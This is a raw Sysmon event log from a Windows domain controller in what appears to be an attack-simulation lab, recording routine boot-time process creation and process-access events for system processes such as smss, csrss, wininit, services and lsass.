10:39:51.932{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000728Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.932{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000727Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.932{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000726Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.932{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000725Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.932{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000724Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.651{733EE690-3DF7-5F80-0B00-000000007F01}868872C:\Windows\system32\lsass.exe{733EE690-3DF6-5F80-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+4e37c|C:\Windows\system32\lsasrv.dll+56c8f|C:\Windows\system32\lsasrv.dll+620fe|C:\Windows\system32\lsass.exe+2086|C:\Windows\system32\lsass.exe+1e11|C:\Windows\system32\lsass.exe+1551|C:\Windows\system32\lsass.exe+4708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000723Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.573{733EE690-3DF7-5F80-0700-000000007F01}716720C:\Windows\system32\wininit.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1000000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wininit.exe+b9e0|C:\Windows\system32\wininit.exe+94ff|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000722Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.573{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000721Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.573{733EE690-3DF7-5F80-0700-000000007F01}716720C:\Windows\system32\wininit.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000720Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.575{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\System32\lsass.exe10.0.14393.2580 (rs1_release_inmarket.181009-1745)Local Security Authority ProcessMicrosoft® Windows® Operating SystemMicrosoft Corporationlsass.exeC:\Windows\system32\lsass.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=5AE8589CDDE46ED132AEF8280BC8894A,SHA256=D957A03C6EA35CBF0C90B0B088DF07E7803A1A3EEB4BA889038F88DB066BBDC4,IMPHASH=0AA67FE637515AC7535797573607EAA2{733EE690-3DF7-5F80-0700-000000007F01}716C:\Windows\System32\wininit.exewininit.exe 10341000x8000000000000000719Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.526{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000718Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.526{733EE690-3DF7-5F80-0700-000000007F01}716720C:\Windows\system32\wininit.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+5977|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000717Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.521{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exe10.0.14393.3383 (rs1_release.191125-1816)Services and Controller appMicrosoft® Windows® Operating SystemMicrosoft Corporationservices.exeC:\Windows\system32\services.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=457FD1B4ED8D29816560345AE5BA9B73,SHA256=D99AA02447946EFB935B11D21DF99AFDDA0955A588D6AAC42746DE73E1253956,IMPHASH=264C7CFAFE91682E421A605C58E86E40{733EE690-3DF7-5F80-0700-000000007F01}716C:\Windows\System32\wininit.exewininit.exe 10341000x8000000000000000716Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.370{733EE690-3DF7-5F80-0600-000000007F01}708712C:\Windows\System32\smss.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\SYSTEM32\ntdll.dll+8c3ce|C:\Windows\SYSTEM32\ntdll.dll+8c179|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+6e87f 154100x8000000000000000715Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.365{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e71SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{733EE690-3DF7-5F80-0600-000000007F01}708C:\Windows\System32\smss.exe- 10341000x8000000000000000714Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.354{733EE690-3DF6-5F80-0200-000000007F01}448460C:\Windows\System32\smss.exe{733EE690-3DF7-5F80-0800-000000007F01}724C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6a54|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+28761|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000713Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.323{733EE690-3DF7-5F80-0400-000000007F01}636640C:\Windows\System32\smss.exe{733EE690-3DF7-5F80-0700-000000007F01}716C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\SYSTEM32\ntdll.dll+8c3ce|C:\Windows\SYSTEM32\ntdll.dll+8c179|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+6e87f 154100x8000000000000000712Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.320{733EE690-3DF7-5F80-0700-000000007F01}716C:\Windows\System32\wininit.exe10.0.14393.2273 (rs1_release_1.180427-1811)Windows Start-Up ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWinInit.exewininit.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=5A998F811D7805B79B8E769027F62FD2,SHA256=8694C5732D26921EEA29589A9FA4182139EF3D9EA6B6D0ACCA8994B4AA5DEFE5,IMPHASH=C8D526C4E61942E1B11AE4B7EE2DDE5D{733EE690-3DF7-5F80-0400-000000007F01}636C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000d8 0000007c 10341000x8000000000000000711Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.323{733EE690-3DF7-5F80-0600-000000007F01}708712C:\Windows\System32\smss.exe{733EE690-3DF7-5F80-0800-000000007F01}724C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\SYSTEM32\ntdll.dll+8c3ce|C:\Windows\SYSTEM32\ntdll.dll+8c179|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+6e87f 154100x8000000000000000710Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.324{733EE690-3DF7-5F80-0800-000000007F01}724C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e71SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{733EE690-3DF7-5F80-0600-000000007F01}708C:\Windows\System32\smss.exe- 10341000x8000000000000000709Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.307{733EE690-3DF6-5F80-0200-000000007F01}448460C:\Windows\System32\smss.exe{733EE690-3DF7-5F80-0600-000000007F01}708C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6a54|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+28761|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000708Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.307{733EE690-3DF6-5F80-0200-000000007F01}448460C:\Windows\System32\smss.exe{733EE690-3DF7-5F80-0600-000000007F01}708C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\SYSTEM32\ntdll.dll+8c3ce|C:\Windows\SYSTEM32\ntdll.dll+8c179|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\SYSTEM32\ntdll.dll+6e87f 154100x8000000000000000707Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.318{733EE690-3DF7-5F80-0600-000000007F01}708C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000bc 0000007c C:\Windows\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e71SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{733EE690-3DF6-5F80-0200-000000007F01}448C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x8000000000000000706Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.307{733EE690-3DF6-5F80-0200-000000007F01}448460C:\Windows\System32\smss.exe{733EE690-3DF7-5F80-0500-000000007F01}644C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6a54|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+28761|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000705Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.182{733EE690-3DF7-5F80-0400-000000007F01}636640C:\Windows\System32\smss.exe{733EE690-3DF7-5F80-0500-000000007F01}644C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\SYSTEM32\ntdll.dll+8c3ce|C:\Windows\SYSTEM32\ntdll.dll+8c179|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+6e87f 154100x8000000000000000704Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.192{733EE690-3DF7-5F80-0500-000000007F01}644C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{733EE690-3DF7-5F80-0400-000000007F01}636C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000d8 0000007c 10341000x8000000000000000703Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.073{733EE690-3DF6-5F80-0200-000000007F01}448632C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}636C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6a54|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+28761|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000702Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.073{733EE690-3DF6-5F80-0200-000000007F01}448632C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}636C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\SYSTEM32\ntdll.dll+8c3ce|C:\Windows\SYSTEM32\ntdll.dll+8c179|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\SYSTEM32\ntdll.dll+6e87f 154100x8000000000000000701Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.083{733EE690-3DF7-5F80-0400-000000007F01}636C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000d8 0000007c C:\Windows\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{733EE690-3DF6-5F80-0200-000000007F01}448C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x8000000000000000700Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:50.526{733EE690-3DF6-5F80-0200-000000007F01}448452C:\Windows\System32\smss.exe{733EE690-3DF6-5F80-0300-000000007F01}588C:\Windows\system32\autochk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\SYSTEM32\ntdll.dll+8c3ce|C:\Windows\SYSTEM32\ntdll.dll+8c179|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+4f84|\SystemRoot\System32\smss.exe+20b6|\SystemRoot\System32\smss.exe+65b2|\SystemRoot\System32\smss.exe+a3bb|\SystemRoot\System32\smss.exe+1652|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+6e87f 154100x8000000000000000699Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:50.515{733EE690-3DF6-5F80-0300-000000007F01}588C:\Windows\System32\autochk.exe10.0.14393.2969 (rs1_release.190503-1820)Auto Check UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationAutoChk.Exe\??\C:\Windows\system32\autochk.exe /q /v *C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=33900CEB40D3ECD3504F1DD287428B49,SHA256=A279FC9CECA961D9040AA69F06A0A78B530E21C788C7D7590E866EFC447E979B,IMPHASH=1BF5E4792E849FE3BCFE23E7C1B21A3F{733EE690-3DF6-5F80-0200-000000007F01}448C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 13241300x8000000000000000698Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2020-10-09 10:39:50.495{733EE690-3DF6-5F80-0100-000000007F01}4SystemHKLM\System\CurrentControlSet\Enum\XENVIF\VEN_XS0001&DEV_NET&REV_0000000B\0\FriendlyNameAWS PV Network Device #0 434400x8000000000000000697Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local2020-10-09 10:40:10.040Started12.04.40 10341000x80000000000000001886Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.994{733EE690-3E0B-5F80-4C00-000000007F01}38403904C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001885Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.760{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0B-5F80-4C00-000000007F01}3840C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001884Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.760{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001883Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 